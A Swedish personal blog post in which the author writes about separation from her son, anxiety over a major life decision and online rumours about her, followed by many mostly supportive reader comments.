Är det okay att sparka på någon som ligger ner? Vuxna människor som gaddar ihop sig och utför ren och skär mobbning! -SKÄMS! på er! Snart förstår du varför…. väldigt snart!

OLYMPUS DIGITAL CAMERA

Hej från Öland! Ja du… efter sjukt lång bilresa ca 8 timmar så kom vi tillslut fram till Öland. Det hade hänt en olycka på midsommarafton (tror jag) vid Södertälje typ, så en bro hade gått sönder. lite dåligt uppdaterad känner jag… men konsekvenserna blev SJUKT långa köer och långa omväga i skogen då man inte kan köra den vanliga väga på E4:an. SUCK!

Men Lilleman var ändå på topp, vi tog några extra bensträckare. Jag hade gjort fika och lunch…. och vi hittade på lekar längemed vägen. Han klagade inte EN ENDA gång! Helt otroligt!  -Fantastiska, älskade Lilleman <3

Ny vecka, nya möjligheter skrev jag imorse. Jag försökte nog mest att övertyga mig själv om jag ska vara ärlig!

När jag började närma mig Kalmar/Öland så knöt det sig i magen. Idag är det ”pappa vecka” och just idag var det sjukt svårt att släppa taget o Lilleman och säga ”hej då”. Jag kämpade emot mina egna tårar, jag svalde, svalde och svalde…… Så fort Ludvigs styvmamma ”tagit över” honom och jag vände ryggen till så forsade tårarna.

FY FAN vad det gör ont! PÅ ALLA PLAN!

Att vara varannan-vecka förälder är ALDRIG lätt. Men just precis nu när känslorna ligger som utanpå kroppen så blir allting tusen gånger svårare! 

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERAJag har idag fått så sjukt många komplimanger för min outfit idag. Normalt sett bloggar jag bla, om mode och skönhet!

Men det känns just nu så långt ifrån där jag befinner mig…Men eftersom att min personal, mina kunder, OCH tjejen på macken gav mig en komplimang så kan jag ändå tipsa om att den finns på REA HÄR Finns även med andra mönster….

-Kul om man mitt i sitt egna elände kan göra någon annan glad =)

OLYMPUS DIGITAL CAMERA

Efter att jag snörvlat över Lilleman, och hela situationen så hade jag ett personalmöte och planering inför veckan. Det är väldigt svårt att vara stark nu. Jag försöker säga till mig själv och intala mig själv följande…. 

”Var stark” ”du klarar detta” ”Kom igen nu” ”Bara några dagar till” ”Bestäm dig”  ”Bryt inte ihop” osv.

Men det gör så jävla ont! Ont i hela kroppen, och själen!  Jag vet hur kryptiskt detta låter. Jag vet att alla vill ha svar NU!

DET vill jag också! Men jag sitter skapligt bakbunden. Detta måste hanteras på rätt sätt. JAG MÅSTE bestämma mig innan jag delar med mig. Jag vände ut och in på mig själv för att göra det.Dag som natt. 

Mitt i allihopa så är det DRAMA BIG-TIME på andra bloggar OM mig!?!

Det tar mig emot att överhuvudtaget omnämna det här inne! Jag görs det EN gång. NU. Efter detta inlägget så kommer jag inte att kommentera det mer! -Okay? 

Det cirkulerar listor om hur jag påstås ha legat och haft sex med diverse gifta män Rykten om mina nära och kära. Alla vet plötsligt så mycket mer än vad jag själv vet.

Det påstås helt enkelt så mycket sjuka grejer att man inte vet om man ska skratta eller gråta!

-Jag väljer det förstnämnda!!!

HUR kan ”vuxna” dvs, 40 plus mammor sitta och backstabba, kasta skit och gadda ihop sig?!

 påståendena är så sjuka saker att man blir mörkrädd!

Inte bara 40 plus utan även 50 plus!?! Nu menar jag INTE att detta har med ålder att göra egentligen. jag känner mig nämligen som 92 i själen…. Jag syftar på att man i den åldern BORDE ha så pass mycket erfarenhet och förnuft att man borde veta bättre!

Det säger MER om personerna i sig som uttrycker sig på detta vis än vad det säger om mig, -kan iallafall jag tycka! 

-VARFÖR?! Är jag ett sånt fruktansvärt stort hot i denna lilla ytliga blogg värld att man bara måste attackera mig, just precis samtidigt som  jag öppet delar med mig om en livskris?!

-En tillfällighet? Nej, skulle inte tro det! 

Anledningen att jag inte kan sova är för att jag står inför ett beslut som kommer att påverka hela min framtid. Inte bara min utan även Lillemans. Och nej beslutet handlar inte om att jag  skulle vara gravid och det har ingenting med vårdnaden med Ludvig att göra!

Detta beslutet ska jag stå för och leva med RESTEN AV MITT LIV. Nu & för alltid! 

Oavsett vilken väg jag kommer att välja så får det konsekvenser. jag är helt ensam i mitt beslut. jag har inte någon man eller familj att luta mig mot. Jag måste stå på helt egna ben och göra detta på rätt sätt.

DET är något större bekymmer än ryktes-spridning  och näthat som plötsligt av en ”tillfällighet”  bara haglar på mig ifrån bittra nättroll/bloggerskor som sitter ”anonymt” bakom sina skärmar och lägger en massa energi på att försöka förpesta mitt liv och sprida elaka rykten HELT UTAN substans!

-SKÄMS på er! (ingen nämnd, ingen glömd) 

VI är mammor, och genom bloggarna och sociala medier ”halv-offentliga” profiler! DÅ borde man väl verkligen förgå med gott exempel????? 

Jag har EN gång gjort ett offentligt uttalande om en bloggkollega, som utefter hur JAG uppfattade det bettet sig väldigt illa mot mig. EN GÅNG!

Jag skrev, jag publicerade det och JAG STOD för det!  

Men ingen annan klarar av att stå för sin åsikt eller sina uttalanden. bara jag….. Nu smutskastas det, med ”interna” kommentarer och bakom olika IP nr. Men man behöver inte vara en Einstein för att se den röda tråden!

Jag har lärt mig mycket av den situationen då JAG gjorde ett offentligt uttalande.

Jag står fortfarande för varenda ord av det jag skrev. men jag skulle sköta det på ett annorlunda sätt idag.

Jag var en gröngöling i bloggbranchen och åkte på både en och flera smällar innan jag lärde mig. Alla kan göra misstag, även jag. jag är långtifrån perfekt!

Gjort är gjort, jag står som sagt var för varenda ord jag skrivit. MEN kommer ALDRIG att lägga mig på den nivån igen. jag kommer ALDRIG att låta mig ”ryckas med” och ge mig ner på den sandlådenivå igen. DET stadiet är ett minne blått!

Ett av mina motton är följande:

”Ett misstag en gång, helt okay. Men att göra SAMMA misstag två gånger är två gånger för mycket” Jag försöker att leva efter just dom orden…. 

Vet du vad… jag är en ”lant lolla” som är uppvuxen på landet. ifrån Vadstena. (en underbar charmig liten stad)  

Jag har inget bohav av att roa mig på andras bekostnad eller slicka uppåt och sparka neråt. Jag sköter MIN grej. Jag kommer fortsättningsvis inte att lägga så mycket som en sekund av min tid eller energi på detta blogg/nät-hats drama som cirkulerar!

JAG SÄGER NEJ TILL NÄTHAT & MOBBNING BÅDE I BLOGG VÄRLDEN MEN OCKSÅ IRL!

-gör du det också så ber jag dig att DELA detta inlägg!  -Tack på förhand <3

Jag ska nu lägga FULLT FOKUS på att ta mitt beslut. Hålla mig samman, så gott det går. Fokusera på min hälsa innan jag fullständigt faller ihop. FOKUSERA PÅ LILLEMAN!

 Jag lyssnar på kroppens varnings signaler, och tar hjälp ev en Psykolog/life coach. Jag försöker att stå emot sömntabletter/ångestdämpande ett tag till. Jag säger inte att det är fel. Jag är bara så förbaskat rädd för att bli beroende och fastna. -LIVRÄDD! 

Jag läser varenda kommentar/mail som ni skriver till mig. Jag är djupt rörd och tacksam över hur många fantastiska, omtänksamma människor som finns där ute <3

jag gråter samtidigt som jag läser era ”historier” och blir både skrämd av hur ”vanligt” det är, men också tacksam över hur modiga ni är som delar med er! Jag är i TILLFÄLLIG psykisk obalans.  Jag är medveten om det.jag kämpar med både kropp och själ!

Jag mår just nu skit, jag är inte på topp, men jag är öppen och ärlig med det….. och står för både vem jag är och vad jag gör till 100% ! 

Jag tar hjälp av min omgivning och väldigt snart…. väldigt snart så kommer DU att få förstå varför!

Fram tills dess!

TACK för att DU är DU! Tack för din omtanke och ditt stöd! Utan dig så vore bloggen INGENTING!

-Vi ska peppa, stötta och lyfta fram varandra <3

Både i med och motgång! -GLÖM INTE DET!

 Det är just i dom lite svårare stunderna som man ser vilka som verkligen bryr sig. Det är just när det blåser extra hårt som man ser vilka som finns…OLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERA

Denna Veckan är det SISTA veckan på våran årliga LAGRRENSNING: 50% på ALLT! Krukor, fruktträd  jord, inredning  kort, ljus, ja…. ALLT!

Just därför kommer jag att befinna mig nere på solen och vindarnas ö, Öland hela veckan.

Precis som Ferdinand så ska jag  dofta på mina blommor, samla kraft i min Handelträdgård. Min fina butik <3 

FullSizeRender

Varma kramar

/ My Martens 

160 Komentarer

 1. Vännen min folk har väl inget annat att göra en att vara dj.mot dem som det går bra för blir så förbannad när jag läser ditt inlägg stå på dig du är en underbar tjej som klarar allt kram till dig och din Goa son

 2. Mobbnig över huvud taget är hemskt, men vuxna människor som beter sig som småungar är värre, de kan inte ha något eget liv. Eller ett fruktansvärt tråkigt. Stå på dig, det gör jag mot idioter. Kram

 3. Men oj! Jag har helt missat allt du skriver om. Låter helt galet. Försök att bara strunta i alla skitsnackare, den enda anledningen till det är avundsjuka. Och jag hoppas du kommer till ro i ditt beslut. Det låter inte lätt men du grejar det <3 Kram

 4. Hoppas att du snart kommer till klarhet om vilket beslut det blir. Det är inte bra att gå för länge med en sån press dom du lever med just nu. Du verkar vara en smart tjej med en fin son. Så strunta i alla knäppa kommentarer. Stora kramar.

 5. Kloka My! Jag håller fullständigt med dig om det du skriver angående mobbing; fullständigt vidrigt! Du gör helt rätt i att inte lägga energi på detta! Sköt om dig! Kram ❤️

 6. Fina starka My! Gör ont att läsa vad du tvingas utstå. Hopas såååå att allt ordnar sig på bästa sätt för dig. Stor kram om dig <3

 7. My jag känner igen mig i så mycket du skriver å har mycket som jag delar med dig å dina känslor å din panik. Jag kämpar varje dag just nu och det tär så fruktansvärt så det går inte att beskriva…. Det känns som en tröst hur konstigt det än låter att någon känner det jag känner å att någon som du vågar vara öppen om det i detta ytliga samhälle. Du e grym!! Kram ❤

 8. Har också helt missat mobbningen. Hoppas du kan skaka av dig den o inte låta dom ta energi. Hemskt beteende!
  Kram till dig !

 9. Hej My!
  Kämpa kämpa och låt dig inte tryckas ner av människor som inte förtjänar din energi. Fokusera på dig själv och dina nära och kära, det beslut du tar blir säkert det bästa för er!
  Du verkar vara en helt fantastisk mamma och önskar dig all lycka och hoppas du mår bättre snart!

 10. Finaste My.Jag man upphör aldrig att förvånas över människor. Håller med dig helt och fullt.Man ska stötta varandra och visa varandra respekt.Man måste inte älska alla,men respekt och vänlighet kan man ändå visa. Massa styrkekramar till dig och lycka till med de jobbiga beslut du ska ta. Gå på din magkänsla.Det som först kommer till dig brukar vara det rätta.

 11. Styrkekramar och stöd i ditt svåra beslut fina My. Strongt att du orkar stå emot trollen och det gift de sprider, kommer aldrig förstå hur de funkar och vad de går igång på (vilket jag är glad för att jag inte kan känna igen mig i) varför fortsätter man läsa o följa om man stör sig så? Vem vill ha de tankarna känslorna? Vi har alla ett ansvar för vad vi säger och skriver så usch o fy för alla elakheter de sprider, igen starkt att du särskilt nu orkar stå emot dem och inte dras med!
  Hoppas du kan finna ro i ditt beslut, inser ju hur det sliter sönder dig. Förstår om du kanske räds mediciner, jag är sån själv. Led av ångest och fick panikångestattacker till och från i samband med att min mamma var cancersjuk och döende så jag förstår lite av vad som händer runt dig och hur förtvivlande det är. Man känner sig så liten och ensam! Vet många som fått bra hjälp av mediciner just för att få den ro o framför allt sömn som krävs för att kunna fatta ett sunt o välgrundat beslut, troligen är det ju så att det värsta lindras när beslutet väl är fattat och genomfört då många gånger just ovissheten är det allra värsta och mest uppslitande. Tänker på dig och hoppas du snart finner ro, krama Tess o ta hand om dig bäst du kan. Stor kram Anna

 12. Jag vill bara önska dig lycka till i vilket beslut du väljer. Det är bara du som kan bestämma som du säger. Vi finns här för dig vad det än blir. Många kramar.

 13. Jag har precis börjat att läsa lite olika bloggar. Din o Magdalena Graaf o Caolina Gynning är dom helt klart bästa bloggarna. Men att det är sån mobbning på sådana här forum kunde jag aldrig föreställa mig. Jag är ju i för sig rätt gammal(49) o kanske inte riktigt begriper vad som händer i Blogg världen. Men i mina öron låter inte detta klokt.
  Du är super stark som orkar med ett svårt livsval + en massa lösa rykten o att folk är elaka. Det skulle göra den starkaste människa till ett vrak. Det är ju ett jobb att blogga o vilken tuff arbetsplats, fullt med vassa armbågar o avundsjuka. Hur som helst har jag fått lära mig hur det går till i Blogg världen o jag skulle aldrig palla det tuffa klimatet.
  Att folk råder dig till att lägga ner bloggen är ju som att säga till någon att inte gå till jobbet. För det här är ju ett av dina jobb. Men är det värt det??? Hoppas du kommer ur den mörka tunneln snart. Vi har ett liv o det ska man vårda o göra saker man mår bra av. Du verkar vara en så mysig tjej!!

 14. Heja dig !
  Hoppas att du finner den väg du vill gå och ingen annan ska påverka dig.
  Du är en ung tjej som är egenföretagare och supersnygg tjej dessutom..tantalurorna är så avis såå!
  Jag hejar på dig o skickar massa styrkekramar från Växjö ?
  Ta hand om dig <3

 15. Ett tips. Lägg ner bloggen när du mår dåligt, sluta upp att skriva om dina bekymmer för då har folk inget att prata om och då blir det tyst ganska fort.
  Man behöver inte berätta att man har det jobbigt på en blogg, du har rätt till ett privatliv som ingen annan har med att göra, man mår ju bara dåligt om man ska läsa vad andra skriver och försvara sig därefter gång efter annan.
  Så mitt tips är att inte prata överhuvudtaget om att du mår dåligt, att du har svåra beslut att ta, eller vad det nu är, finns alltid folk som vänder allt emot en ändå och den glädjen ska man inte ge folk.
  Sedan undrar man ju var alla dina vänner som är ”kändisar” finns i din situation nu? Du har ju visat väldigt mycket kändisar på din blogg, och riktiga vänner finns tveklöst i motgångar så att man inte ska behöva må dåligt, det är just i motgångar man ser vem som är ens vänner.
  När det gäller svåra beslut ska man alltid gå på magkänslan, innerst inne vet man oftast vilket beslut man ska ta även om det är obekvämt.
  Och om man råkar ta ett felaktigt beslut, så vänjer sig människan konstigt nog vid även en sådan situation även om den är skitjobbig, människan är skapt för att vänja sig vid olika situationer. Har själv tagit flera jobbiga beslut som jag inte trodde jag skulle klara av, men man vänjer sig även mot sin vilja med tiden.
  Ta inga förhastade beslut, ta det i den takt som du själv bestämmer, och låt dig inte påverkas av andras påtryckningar om att du måste bestämma dig då eller då, utan det är ditt beslut och låt ingen pressa utan ta den tid du behöver, de som väntar på ett beslut får väl vänta tills DU känner att tiden är mogen för ett beslut.
  Var stark och tvivla aldrig på dig själv. Skit i vad andra tycker.

  • Tack <3 kloka ord…. Vad det gäller bloggen så har jag valt att skriva öppet om hur jag mår. För att det känns rätt, just nu iallafall <3 kram

   • Tror att det är bra att livet visas både i med och motgång. Starkt av dig att skriva om din situation. Viktigt att vi inte gömmer och skambelägger psykiskohälsa. Det är skillnad på att vara personlig och privat. Själv skriver jag på både min blogg och på Insta @mrs_excalibur om kampen att ta mig ur utmattningssyndrom. Stor kram

 16. Jag tog slut som människa -99 det tog 11 år att bygga upp. Så söta ”kör” dej inte för långt.
  Det där med att vara singel och snygg kommer tyvärr alltid sitta som en tagg i ögat på främst dom som är lite äldre. Kanske nyligen fått barn och känner sig lite saggiga. Deras dåliga självkänsla. Bin ther dan that eller hur det stavas.
  Krammar i massor från en gammal kärring som följer dej ❤️❤️❤️

 17. Vill bara skicka en stor kram och massa kärlek till dig <3 Hoppas innerligt att du har bra människor runt dig, som stöttar och tror på dig.

 18. All pepp och styrka till dig My, om ett tag kommer du vara ute på andra sidan starkare än innan, det vet jag. Sen är det riktigt små människor som håller på och snackar skit, lägg ingen tankemöda där nu, ignorera. Glöm aldrig att du har folk bakom dig som vill dig allt gott. Stor kram och lycka till med beslutet.

 19. Hej! Har inte heller märkt nån mobbning men jag läser iofs inte kommentarerna så ofta. Men egentligen varför bryr du dig om några fega läsare sitter och kommentera taskiga saker? Dem är ju ändå bara nättroll. Hade förstått mer att man mår dåligt och lägger ner energi om man känner dem som snackar skit. Men jag hoppas du snart mår bättre och blir glad igen

 20. Stor Kram till dig, så lågt med bloggtjafs på den här nivån. Säger alltid mer om folk som skriver så. Försök håll din linje även om du har det svårt just nu!

 21. Vill bara skicka all kärlek i världen till dig My! Tycker att du är hur stark som helst – för den här svackan är inte svaghet i mina ögon – det är bara en del av livet. Det har ingenting med styrka att göra, snarare kanske personlighetsdrag i så fall.
  Alla har vi svackor, ångest och livsomvälvande händelser i livet som vi måste bita oss igenom. Och om folk nu ”håller ihop” den där fasaden och tror att den där ytliga tillvaron de målar upp gör dom bättre på något vis tja, så naiv att man tror på det kan väl ingen vara?
  Jag har också panikångest i perioder. Och sen blir den bättre och det enda ångestdämpande jag behöver är min som. Han är klistret som håller ihop själen när det känns som den ska spricka.
  All styrka till dig My! Vill bara ge dig världens största kram <3 Ge dig själv tid bara. Och framförallt – var inte hård mot dig själv för det förtjänar du inte!

 22. Vännen min folk har väl inget annat att göra en att vara dj.mot dem som det går bra för blir så förbannad när jag läser ditt inlägg stå på dig du är en underbar tjej som klarar allt kram till dig och din Goa son

 23. Mobbnig över huvud taget är hemskt, men vuxna människor som beter sig som småungar är värre, de kan inte ha något eget liv. Eller ett fruktansvärt tråkigt. Stå på dig, det gör jag mot idioter. Kram

 24. Men oj! Jag har helt missat allt du skriver om. Låter helt galet. Försök att bara strunta i alla skitsnackare, den enda anledningen till det är avundsjuka. Och jag hoppas du kommer till ro i ditt beslut. Det låter inte lätt men du grejar det <3 Kram

 25. Hoppas att du snart kommer till klarhet om vilket beslut det blir. Det är inte bra att gå för länge med en sån press dom du lever med just nu. Du verkar vara en smart tjej med en fin son. Så strunta i alla knäppa kommentarer. Stora kramar.

 26. Usch vilken mardröm du lever i just nu ! Och mitt i ditt svåra beslut ska du behöva stå emot dumma, korkade kommentarer. Vuxna människor som mobbar ! Fy fasen vilket samhälle vi lever i…. Hoppas att du får vakna upp ur mardrömmen snart o komma stark ut ur den. KRAM

 27. Dom som skriver illa om dig och sprider förtal mm… Dom är avundsjuka på dig! Och nu när dom inte vet varför du mår dåligt måste dom strö på mer. Suck..att det finns så många avundsjuka människor.
  Orka kämpa!!

 28. Kloka My! Jag håller fullständigt med dig om det du skriver angående mobbing; fullständigt vidrigt! Du gör helt rätt i att inte lägga energi på detta! Sköt om dig! Kram ❤️

 29. Har inte sett någon mobbing mot dig på andra bloggar, ej heller någon lista som cirkulerar men däremot såg jag en kommentar på en mindre blogg, ingen direkt lista, en skvallerkommentar som drabbade flera, som togs bort. Hur vet du att 40-plusmammor gaddar ihop sig? Andra bloggare måste ha rätt att skriva om sina tankar o känslor utan att det ska anses vara mobbing…du får inte ta åt dig och tro att allt som skrivs är riktat mot dig, var inte så känslig…men vet man är känslig då man har ångest. Trist att du känner dig ensam i ditt beslut men kan du inte få stöd av dina föräldrar och nära vänner, du är ju inte helt ensam ändå. Imponerande hur du ändå orkar och klarar att skriva långa väldigt välskrivna inlägg och härligt med det stöd och kärlek du får här. Gällande ditt beslut, kanske du redan bestämt dig, men jag råder dig Behåll!! Behåll om det går och flytta nära din son, som du säger du får styrka av sonen, tror du mår bra i själen av att finnas nära och du kan pendla till Sthlm vid jobb och nöjen! När man tvekar mycket om något så ska man låta det vara, behålla det, att ångra sig sen är fruktansvärt och kan ge svår ångest, så om det finns möjlighet behåll! Om det nu är vad jag tror, men du känner bäst själv. Kram

  • Till Lia: Min kommentar kommer inte att synas, faktabaserad information hör inte hemma i denna bransch. My raderar och väljer och det är väl OK.
   Till My nu då: Varför förstår inte DU att ditt företag är konkursmässigt och att du bara har ett som du yrar om VAL? Jo du förstår så klart men sluta larva nu. Du blir inte rikare på att lura och hålla på.
   Allt gott,
   HT

  • Bara för att du Lia inte sett något på andra bloggar eller någon lista så är det väl inget som säger att det inte finns.

 30. Fina starka My! Gör ont att läsa vad du tvingas utstå. Hopas såååå att allt ordnar sig på bästa sätt för dig. Stor kram om dig <3

 31. Beundrar dig, du är så klok o fin. Min förebild trots att jag är öv 40. Önskar jag hade modet o styrkan du har. Vet att du fixar det här. Många varma kramar till dig, DU ger mig styrkan att kämpa för att överleva

 32. My jag känner igen mig i så mycket du skriver å har mycket som jag delar med dig å dina känslor å din panik. Jag kämpar varje dag just nu och det tär så fruktansvärt så det går inte att beskriva…. Det känns som en tröst hur konstigt det än låter att någon känner det jag känner å att någon som du vågar vara öppen om det i detta ytliga samhälle. Du e grym!! Kram ❤

 33. Har också helt missat mobbningen. Hoppas du kan skaka av dig den o inte låta dom ta energi. Hemskt beteende!
  Kram till dig !

 34. Hej My!
  Kämpa kämpa och låt dig inte tryckas ner av människor som inte förtjänar din energi. Fokusera på dig själv och dina nära och kära, det beslut du tar blir säkert det bästa för er!
  Du verkar vara en helt fantastisk mamma och önskar dig all lycka och hoppas du mår bättre snart!

 35. Finaste My.Jag man upphör aldrig att förvånas över människor. Håller med dig helt och fullt.Man ska stötta varandra och visa varandra respekt.Man måste inte älska alla,men respekt och vänlighet kan man ändå visa. Massa styrkekramar till dig och lycka till med de jobbiga beslut du ska ta. Gå på din magkänsla.Det som först kommer till dig brukar vara det rätta.

 36. Styrkekramar och stöd i ditt svåra beslut fina My. Strongt att du orkar stå emot trollen och det gift de sprider, kommer aldrig förstå hur de funkar och vad de går igång på (vilket jag är glad för att jag inte kan känna igen mig i) varför fortsätter man läsa o följa om man stör sig så? Vem vill ha de tankarna känslorna? Vi har alla ett ansvar för vad vi säger och skriver så usch o fy för alla elakheter de sprider, igen starkt att du särskilt nu orkar stå emot dem och inte dras med!
  Hoppas du kan finna ro i ditt beslut, inser ju hur det sliter sönder dig. Förstår om du kanske räds mediciner, jag är sån själv. Led av ångest och fick panikångestattacker till och från i samband med att min mamma var cancersjuk och döende så jag förstår lite av vad som händer runt dig och hur förtvivlande det är. Man känner sig så liten och ensam! Vet många som fått bra hjälp av mediciner just för att få den ro o framför allt sömn som krävs för att kunna fatta ett sunt o välgrundat beslut, troligen är det ju så att det värsta lindras när beslutet väl är fattat och genomfört då många gånger just ovissheten är det allra värsta och mest uppslitande. Tänker på dig och hoppas du snart finner ro, krama Tess o ta hand om dig bäst du kan. Stor kram Anna

 37. Hej My,
  Se tillbaka på vad DU åstadkommit och vad DU visat oss andra, DU är en stark kvinna,har klarat en massa,vilket DU kommer att göra nu också. Ha bara kvar tron på dig själv och Lilleman kan vara den bästa medicinen av alla. Har själv varit där med panikångest.Stor kram till dig

 38. Jag vill bara önska dig lycka till i vilket beslut du väljer. Det är bara du som kan bestämma som du säger. Vi finns här för dig vad det än blir. Många kramar.

 39. Jag har precis börjat att läsa lite olika bloggar. Din o Magdalena Graaf o Caolina Gynning är dom helt klart bästa bloggarna. Men att det är sån mobbning på sådana här forum kunde jag aldrig föreställa mig. Jag är ju i för sig rätt gammal(49) o kanske inte riktigt begriper vad som händer i Blogg världen. Men i mina öron låter inte detta klokt.
  Du är super stark som orkar med ett svårt livsval + en massa lösa rykten o att folk är elaka. Det skulle göra den starkaste människa till ett vrak. Det är ju ett jobb att blogga o vilken tuff arbetsplats, fullt med vassa armbågar o avundsjuka. Hur som helst har jag fått lära mig hur det går till i Blogg världen o jag skulle aldrig palla det tuffa klimatet.

  Att folk råder dig till att lägga ner bloggen är ju som att säga till någon att inte gå till jobbet. För det här är ju ett av dina jobb. Men är det värt det??? Hoppas du kommer ur den mörka tunneln snart. Vi har ett liv o det ska man vårda o göra saker man mår bra av. Du verkar vara en så mysig tjej!!

 40. Hej vackra fina My!
  Jag tror av egen erfarenhet att man tvärtemot vad ordspråket säger faktiskt inte att man blir stärkt av motgångar.
  Till slut kommer man till vägs ände när kroppen säger ifrån med olika signaler som man till slut måste lyssna till. Det känns som du tar tar din kropps varningssignaler på allvar och det är TOPPEN att du är lyhörd över hur din själ mår.
  Du kommer bli hel och hitta tillbaks till din inte styrka. Ingen människa är stark hela tiden, det är lika mänskligt att vara svag och när själen blir trött av tankar och motgångar i livet så är det bästa att inte lägga sig ner och ge upp, det är det sämsta du kan göra utan ta tag i de jobbiga bitarna så känns allt bättre sen.
  Jag skriver enbart av min egna erfarenhet så jag är ingen expertis på något sätt. Men jag har själv drabbats av ångest under en period och för min del var den postdramatisk. Min mamma gick bort alldeles för tidigt i cancer och sorgen kom i kapp på många olika sätt bl a genom oförklarlig ångest. Tror den kom utav att att min trygga värld rasade och jag var tvungen att vara stark så länge för de andra som var svagare i situationen.
  Du gör nog bra i att strunta i medicinen, du tar dig igenom den här ångestperioden. Du kommer vänja dig och ångesten ändrar karaktär eller vad man ska säga. Jag är idag vän med min ångest och när dem kommer vet jag att jag inte ska lägga mig ner utan resa mig upp och ta dagen som den kommer med allt vad det innebär och styra upp livet.
  Ta kontroll över ditt liv My. Det är nog bästa medicinen för dig! Du är på god väg tror jag. Allt blir bra!! Det kommer bli bra nån gång. Lita på din magkänsla för då tar du de bästa beslut.
  Lycka till med dina val! Du gör de med hjärtat och då kan du förlåta dig själv om det går åt pipan.. Vilket det inte kommer göra!!
  Hoppas du sover gott inatt!!
  PS strunta i alla listor mm. De fåtal personer som läser listorna är idioter om de litar till skvaller. Och de som skriver sånt skit, karma säger jag! Baam ?

  • En sak till My..
   Det är ditt liv och ingen kan råda dig till vad du ska göra. Fortsatt gå din egna väg som du alltid gjort.
   Själv är jag oändligt tacksam för vad jag står idag, jag hade aldrig varit så lycklig om jag lyssnat på vad andra tyckte, tack o lov!!
   Det kan vara tufft men du måste vara sann mot dig själv.

 41. My! Allt går att lösa det vet du va? ALLT!
  Du är en klok kvinna som är trygg i dig själv, det märks långa vägar!
  Därför är jag helt säker på att du väljer ”rätt” väg här i livet även om jag faktist kan ana vad det är.
  Du lever en gång, lev det livet som får dig att må bra. Du kommer efter denna storm vara starkare än någonsin❤️
  O du… Låt andra skriva skit om dig, det säger mer om dem än dig. Endast de svaga människorna ger sig på andra, ha det alltid i bakhuvudet! Kram

 42. Heja dig !
  Hoppas att du finner den väg du vill gå och ingen annan ska påverka dig.
  Du är en ung tjej som är egenföretagare och supersnygg tjej dessutom..tantalurorna är så avis såå!
  Jag hejar på dig o skickar massa styrkekramar från Växjö 🙂
  Ta hand om dig <3

 43. Ett tips. Lägg ner bloggen när du mår dåligt, sluta upp att skriva om dina bekymmer för då har folk inget att prata om och då blir det tyst ganska fort.

  Man behöver inte berätta att man har det jobbigt på en blogg, du har rätt till ett privatliv som ingen annan har med att göra, man mår ju bara dåligt om man ska läsa vad andra skriver och försvara sig därefter gång efter annan.

  Så mitt tips är att inte prata överhuvudtaget om att du mår dåligt, att du har svåra beslut att ta, eller vad det nu är, finns alltid folk som vänder allt emot en ändå och den glädjen ska man inte ge folk.

  Sedan undrar man ju var alla dina vänner som är ”kändisar” finns i din situation nu? Du har ju visat väldigt mycket kändisar på din blogg, och riktiga vänner finns tveklöst i motgångar så att man inte ska behöva må dåligt, det är just i motgångar man ser vem som är ens vänner.

  När det gäller svåra beslut ska man alltid gå på magkänslan, innerst inne vet man oftast vilket beslut man ska ta även om det är obekvämt.

  Och om man råkar ta ett felaktigt beslut, så vänjer sig människan konstigt nog vid även en sådan situation även om den är skitjobbig, människan är skapt för att vänja sig vid olika situationer. Har själv tagit flera jobbiga beslut som jag inte trodde jag skulle klara av, men man vänjer sig även mot sin vilja med tiden.

  Ta inga förhastade beslut, ta det i den takt som du själv bestämmer, och låt dig inte påverkas av andras påtryckningar om att du måste bestämma dig då eller då, utan det är ditt beslut och låt ingen pressa utan ta den tid du behöver, de som väntar på ett beslut får väl vänta tills DU känner att tiden är mogen för ett beslut.

  Var stark och tvivla aldrig på dig själv. Skit i vad andra tycker.

  • Tack <3 kloka ord…. Vad det gäller bloggen så har jag valt att skriva öppet om hur jag mår. För att det känns rätt, just nu iallafall <3 kram

   • Tror att det är bra att livet visas både i med och motgång. Starkt av dig att skriva om din situation. Viktigt att vi inte gömmer och skambelägger psykiskohälsa. Det är skillnad på att vara personlig och privat. Själv skriver jag på både min blogg och på Insta @mrs_excalibur om kampen att ta mig ur utmattningssyndrom. Stor kram

 44. Jag tog slut som människa -99 det tog 11 år att bygga upp. Så söta ”kör” dej inte för långt.

  Det där med att vara singel och snygg kommer tyvärr alltid sitta som en tagg i ögat på främst dom som är lite äldre. Kanske nyligen fått barn och känner sig lite saggiga. Deras dåliga självkänsla. Bin ther dan that eller hur det stavas.
  Krammar i massor från en gammal kärring som följer dej ❤️❤️❤️

 45. Vill bara skicka en stor kram och massa kärlek till dig <3 Hoppas innerligt att du har bra människor runt dig, som stöttar och tror på dig.

 46. All pepp och styrka till dig My, om ett tag kommer du vara ute på andra sidan starkare än innan, det vet jag. Sen är det riktigt små människor som håller på och snackar skit, lägg ingen tankemöda där nu, ignorera. Glöm aldrig att du har folk bakom dig som vill dig allt gott. Stor kram och lycka till med beslutet.

 47. Hej my! Förstår att du mår dåligt nu men tänk på en sak. När du skriver om ”vad andra skriver om dig” så fjuttar du liv i elden igen. Låt den bara slockna. Jag förstår att man vill försvara sig men låt det vara bara. Dessutom…de flesta som läser här inne följer inte med i skvallret och vet inte men iom att du påtalar det så finns det alltid folk som blir nyfikna vill ta reda på. Och då blossar det liv igen. Så ett råd…kill them with silence är det bästa. Även om jag förstår att du vill bemöta det….

 48. Hej! Har inte heller märkt nån mobbning men jag läser iofs inte kommentarerna så ofta. Men egentligen varför bryr du dig om några fega läsare sitter och kommentera taskiga saker? Dem är ju ändå bara nättroll. Hade förstått mer att man mår dåligt och lägger ner energi om man känner dem som snackar skit. Men jag hoppas du snart mår bättre och blir glad igen

 49. Stor Kram till dig, så lågt med bloggtjafs på den här nivån. Säger alltid mer om folk som skriver så. Försök håll din linje även om du har det svårt just nu!

 50. Vill bara skicka all kärlek i världen till dig My! Tycker att du är hur stark som helst – för den här svackan är inte svaghet i mina ögon – det är bara en del av livet. Det har ingenting med styrka att göra, snarare kanske personlighetsdrag i så fall.

  Alla har vi svackor, ångest och livsomvälvande händelser i livet som vi måste bita oss igenom. Och om folk nu ”håller ihop” den där fasaden och tror att den där ytliga tillvaron de målar upp gör dom bättre på något vis tja, så naiv att man tror på det kan väl ingen vara?

  Jag har också panikångest i perioder. Och sen blir den bättre och det enda ångestdämpande jag behöver är min som. Han är klistret som håller ihop själen när det känns som den ska spricka.

